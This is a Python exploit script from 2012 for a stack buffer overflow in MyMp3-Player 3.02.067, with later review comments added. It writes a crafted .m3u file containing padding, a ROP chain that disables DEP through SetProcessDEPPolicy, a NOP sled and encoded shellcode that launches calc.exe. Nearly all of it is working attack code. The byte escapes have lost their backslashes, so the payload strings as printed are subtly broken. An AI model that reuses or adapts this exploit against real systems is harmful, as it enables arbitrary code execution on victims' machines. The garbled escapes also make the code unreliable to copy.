
# Title : MyMp3 Player Stack .m3u DEP Bypass Exploit
# Published : 2012-07-23
# Author :


'''
Title: MyMp3-Player '.m3u' Stack BOF (Bypass DEP)
Author: Daniel Romero Perez (@daniel_rome)
Software & Version: MyMp3-Player 3.02.067
Tested on: Windows XP SP3 - ES
Mail: unlearnsecurity@gmail.com
Blog: unlearningsecurity.blogspot.com
Advisory: http://www.securityfocus.com/bid/38835/info
Article: http://unlearningsecurity.blogspot.com.es/2012/07/bypass-dep-no-permanente-con.html
'''
import os
import struct

# What this script does: it concatenates four pieces (padding, ROP chain,
# NOP sled, shellcode) into one string and writes that string to an .m3u
# playlist file in the current directory.  The script itself performs no
# network or process activity; the generated file is its only output.
# NOTE(review): `os` is imported but never used below.

# Buffer 
# Padding that, per the author, fills the vulnerable stack buffer up to the
# saved return address.  The offset is the author's finding and cannot be
# verified from this listing alone.
Buff = "x41" * 1024

# ShellCode (ruby msfpayload windows/exec CMD=calc.exe R | ruby msfencode -b 'x0ax0dx20x00' -t c) - 227 bytes
# The bytes below are opaque here; the only description of them is the
# author's comment above (encoder output, bad characters excluded via -b).
ShellCode = ("xb8xf8x16x8ax64xd9xe9xd9x74x24xf4x5ex2bxc9xb1"
	"x33x31x46x12x83xc6x04x03xbex18x68x91xc2xcdxe5"
	"x5ax3ax0ex96xd3xdfx3fx84x80x94x12x18xc2xf8x9e"
	"xd3x86xe8x15x91x0ex1fx9dx1cx69x2ex1ex91xb5xfc"
	"xdcxb3x49xfex30x14x73x31x45x55xb4x2fxa6x07x6d"
	"x24x15xb8x1ax78xa6xb9xccxf7x96xc1x69xc7x63x78"
	"x73x17xdbxf7x3bx8fx57x5fx9cxaexb4x83xe0xf9xb1"
	"x70x92xf8x13x49x5bxcbx5bx06x62xe4x51x56xa2xc2"
	"x89x2dxd8x31x37x36x1bx48xe3xb3xbexeax60x63x1b"
	"x0bxa4xf2xe8x07x01x70xb6x0bx94x55xccx37x1dx58"
	"x03xbex65x7fx87x9bx3ex1ex9ex41x90x1fxc0x2dx4d"
	"xbax8axdfx9axbcxd0xb5x5dx4cx6fxf0x5ex4ex70x52"
	"x37x7fxfbx3dx40x80x2ex7axbexcax73x2ax57x93xe1"
	"x6fx3ax24xdcxb3x43xa7xd5x4bxb0xb7x9fx4exfcx7f"
	"x73x22x6dxeax73x91x8ex3fx10x74x1dxa3xf9x13xa5"
	"x46x06")
	
# NOP sled placed between the ROP chain and the shellcode (see the
# `exploit =` line); presumably the landing area once the chain hands
# control to the stack.
Nops = "x90" * 50
	
##ROP --> Bypass DEP with SetProcessDEPPolicy
# Defender notes on the chain below:
# - Every gadget address is a fixed constant, so the chain only works when
#   the modules it points into load at the addresses the author observed on
#   the platform named in the header (Windows XP SP3 - ES); a randomized
#   module layout breaks it.  Which modules the addresses belong to is not
#   stated on this page.
# - The argument passed to SetProcessDEPPolicy is built as
#   0xFFFFFFFF + 1 = 0 (POP EBX, then INC EBX) -- see the author's inline
#   comment on the PARAMETER line.
# - NOTE(review): SetProcessDEPPolicy cannot change the policy of a process
#   whose DEP setting is permanent; the author's article title ("bypass DEP
#   no permanente") is consistent with that limitation.
ROP = struct.pack('<L',0x77f4c25f) # POP EBX / RET
ROP += struct.pack('<L',0x41414141) # JUNK
ROP += struct.pack('<L',0xFFFFFFFF) # PARAMETER 0x00000000 - 0x1 = 0xFFFFFFFF
ROP += struct.pack('<L',0x7e810b7e) # INC EBX / RET
ROP += struct.pack('<L',0x77f445bf) # POP EBP / RET
ROP += struct.pack('<L',0x7C862144) # <- SetProcessDEPPolicy
ROP += struct.pack('<L',0x77f45493) # POP EDI / RET
ROP += struct.pack('<L',0x77f4108c) # RET
ROP += struct.pack('<L',0x77f4567e) # POP ESI  / RET
ROP += struct.pack('<L',0x77f4108c) # RET
ROP += struct.pack('<L',0x58c35ff7) # PUSHAD / RET

# Exploit
# Final file layout, in order: padding, ROP chain, NOP sled, shellcode.
# NOTE(review): this script targets Python 2.  On Python 3 struct.pack
# returns bytes, so the str + bytes concatenation on the next line raises
# TypeError before any file is written.
exploit = Buff + ROP + Nops + ShellCode

# Create File
# Written in binary mode to the current working directory; the name is
# fixed.  `file` shadows the builtin of the same name (harmless here, but
# a style smell).
file = open("exploit_mymp3-player_BOF.m3u", "wb")
file.write(exploit)
file.close()

print ("Your file has been generated successfully!!")